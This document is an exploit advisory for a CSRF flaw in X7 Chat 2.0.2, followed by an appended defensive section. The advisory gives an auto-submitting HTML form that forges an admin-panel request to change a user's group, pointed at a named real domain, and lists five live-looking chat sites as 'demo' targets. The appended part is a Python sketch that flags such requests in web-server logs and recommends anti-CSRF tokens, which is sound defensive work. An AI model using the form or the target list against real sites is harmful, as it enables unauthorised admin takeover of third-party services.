X7 CHAT 2.0.2 CSRF Add Admin Vulnerability

Author: TUNISIAN CYBER , Published: 13-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: X7 CHAT 2.0.2 CSRF Add Admin Vulnerability
[+] Date: 13-12-2013
[+] Category: WebApp
[+] Vendor: http://www.x7chat.com/
[+] Google Dork: Do Some Work and you'll find it :)
[+] Tested on: Win7 , ubuntu 13.04


########################################################################################
<html>
<body onload="document.xform.submit();">
<form name="xform" action="http://www.ahleenarab.com/chat/index.php?act=adminpanel&cp_page=users&update=USER" method="post">
<input type="hidden" name="username" value="USER" />
<input type="hidden" name="usergroup" value="PASSWORD" />
</form>
</body>
</html>

Change USER and PASSWORD (the placeholder values in the form above)

Demo:
http://www.ahleenarab.com/chat/
http://www.chat4u.eb2a.com/chat/
http://users.atw.hu/zenechat/chat/
http://www.zenechat.atw.hu/chat
http://filip.yw.sk/Chat/
########################################################################################
Greets to: XMaXtn, N43il HacK3r, XtechSEt
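
For defenders, the forged request above has a recognisable shape in web-server logs: a POST to index.php with act=adminpanel, cp_page=users and an update parameter, arriving with a Referer from another site or none at all. The following detection sketch is an added example, not part of the original advisory or of X7 Chat; the combined log format, the host names chat.example and other.example, and the function names are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" access-log format (an assumption about the server).
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"'
)

# Constructed sample lines; chat.example and other.example are placeholder hosts.
SAMPLE = [
    '192.0.2.10 - - [13/Dec/2013:10:00:01 +0000] "POST /chat/index.php?act=adminpanel&cp_page=users&update=alice HTTP/1.1" 200 512 "http://chat.example/chat/index.php?act=adminpanel&cp_page=users" "Mozilla/5.0"',
    '192.0.2.10 - - [13/Dec/2013:10:05:42 +0000] "POST /chat/index.php?act=adminpanel&cp_page=users&update=mallory HTTP/1.1" 200 512 "http://other.example/page.html" "Mozilla/5.0"',
    '192.0.2.10 - - [13/Dec/2013:10:06:00 +0000] "GET /chat/index.php?act=adminpanel&cp_page=users HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [13/Dec/2013:10:07:15 +0000] "POST /chat/index.php?act=adminpanel&cp_page=users&update=bob HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

def updated_user(target):
    """Return the `update` value if target has the advisory's request shape
    (index.php?act=adminpanel&cp_page=users&update=...), else None."""
    parts = urlsplit(target)
    q = parse_qs(parts.query, keep_blank_values=True)
    if (parts.path.endswith("/index.php") and q.get("act") == ["adminpanel"]
            and q.get("cp_page") == ["users"] and "update" in q):
        return q["update"][0]
    return None

def suspicious_updates(lines, site_hosts):
    """List (ip, time, updated_user, referer) for POSTs to the user-update page
    whose Referer is absent or names a host outside site_hosts."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m or m["method"] != "POST":
            continue
        user = updated_user(m["target"])
        if user is None:
            continue
        ref_host = urlsplit(m["referer"]).hostname  # None for "-" or empty
        if ref_host is None or ref_host.lower() not in site_hosts:
            hits.append((m["ip"], m["ts"], user, m["referer"]))
    return hits

if __name__ == "__main__":
    for hit in suspicious_updates(SAMPLE, {"chat.example"}):
        print(hit)
```

A missing Referer also occurs in legitimate traffic, so hits are leads to review against known admin activity. The underlying fix is for the admin panel to require an unpredictable per-session anti-CSRF token on every state-changing request.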